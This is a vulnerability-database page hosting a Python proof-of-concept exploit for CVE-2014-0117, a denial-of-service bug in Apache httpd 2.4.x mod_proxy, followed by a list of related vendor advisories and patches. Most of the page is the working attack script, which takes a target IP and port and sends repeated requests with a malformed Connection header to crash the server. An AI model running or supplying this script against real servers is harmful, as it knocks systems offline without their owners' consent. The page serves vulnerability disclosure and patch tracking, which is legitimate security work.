Lucene search
RootSSV:87152HistoryJul 24, 2014 - 12:00 a.m.
Apache 2.4.x mod_proxy 拒绝服务攻击 PoC
2014-07-2400:00:00
Root
www.seebug.org
580
0.969 High
EPSS
Percentile
99.6%
No description provided by source.
# Exploit Title: Apache 2.4.x mod_proxy Denial Of Service(CVE-2014-0117)
# Date: 2014-07-20
# Exploit Author: aisyhi
# Version: 0.1
# Apache httpd 2.4.6 to 2.4.9
# Tested on: Apache/2.4.7
# CVE : CVE-2014-0117
import httplib
import logging
import time
import socket
import sys
import os
debug = False
socket.setdefaulttimeout(3)
httplib.HTTPConnection.debuglevel = 1 if debug else 0
packet = 0
print "======================================================================"
print u"Apache 2.4.x mod_proxy Denial Of Service(CVE-2014-0117)"
print "======================================================================"
if len(sys.argv) < 2:
print "Usage: python CVE-2014-0117.py [target ip] [target port]\n"
print "Example: python CVE-2014-0117 127.0.0.1\n"
sys.exit(1)
else:
host = sys.argv[1].lower()
try:
port = int(sys.argv[2])
except:
port = 80
while packet <= 10:
try:
con = httplib.HTTPConnection(host, port)
con.putrequest('GET', '/')
con.putheader('User-Agent', "curl/7.30.0")
con.putheader('Accept', "*/*")
con.putheader('Connection', ";")
con.endheaders()
except:
print "Connection error!"
sys.exit(1)
try:
resp = con.getresponse()
print(resp.status, resp.reason)
except socket.timeout:
print "[*] Socket timeout?"
except:
print "[*] Knock knock, is anybody there ? (" + str(packet) + "/10)"
packet = packet + 1
con.close()
print "[+] Done!"
Related
checkpoint_advisories
checkpoint_advisories
openvas
openvas
Apache HTTP Server Mod_Cache Denial of service Vulnerability -01 May15
2015-05-27 00:00:00
Ubuntu Update for apache2 USN-2299-1
2014-07-28 00:00:00
Fedora Update for httpd FEDORA-2014-9057
2014-08-15 00:00:00
httpd
httpd
Apache Httpd < 2.4.10 : mod_proxy denial of service
2014-04-07 00:00:00
ubuntucve
ubuntucve
CVE-2014-0117
2014-07-20 00:00:00
packetstorm
packetstorm
Apache 2.4.x mod_proxy Denial Of Service
2014-07-22 00:00:00
prion
prion
Design/Logic Flaw
2014-07-20 11:12:00
nessus
nessus
Apache HTTP Server 2.4.6, 2.4.7, 2.4.9 Vulnerability
2014-07-29 00:00:00
Fedora 20 : httpd-2.4.10-1.fc20 (2014-8742)
2014-07-26 00:00:00
Fedora 19 : httpd-2.4.10-1.fc19 (2014-9057)
2014-08-15 00:00:00
cve
cve
CVE-2014-0117
2014-07-20 11:12:00
debiancve
debiancve
CVE-2014-0117
2014-07-20 11:12:00
zdi
zdi
Apache HTTP Server mod_proxy Denial Of Service Vulnerability
2014-07-18 00:00:00
securityvulns
securityvulns
Apache multiple security vulnerabilities
2014-07-28 00:00:00
[USN-2299-1] Apache HTTP Server vulnerabilities
2014-07-28 00:00:00
APPLE-SA-2015-04-08-2 OS X 10.10.3 and Security Update 2015-004
2015-04-09 00:00:00
slackware
slackware
[slackware-security] httpd
2014-07-24 01:35:41
ubuntu
ubuntu
Apache HTTP Server vulnerabilities
2014-07-23 00:00:00
fedora
fedora
[SECURITY] Fedora 19 Update: httpd-2.4.10-1.fc19
2014-08-15 02:47:11
[SECURITY] Fedora 20 Update: httpd-2.4.10-1.fc20
2014-07-25 10:03:52
mageia
mageia
Updated apache package fixes security vulnerabilities
2014-07-30 01:30:55
oraclelinux
oraclelinux
httpd security update
2014-07-23 00:00:00
httpd24-httpd security and bug fix update
2016-02-04 00:00:00
redhat
redhat
(RHSA-2014:0922) Important: httpd24-httpd security update
2014-07-23 00:00:00
(RHSA-2014:0921) Important: httpd security update
2014-07-23 00:00:00
freebsd
freebsd
apache24 -- several vulnerabilities
2014-07-15 00:00:00
veracode
veracode
Denial Of Service (DoS)
2019-05-02 05:03:43
f5
f5
centos
centos
httpd, mod_ldap, mod_proxy_html, mod_session, mod_ssl security update
2014-07-23 15:36:55
ibm
ibm
oracle
oracle
Oracle Critical Patch Update Advisory - January 2015
2015-03-10 00:00:00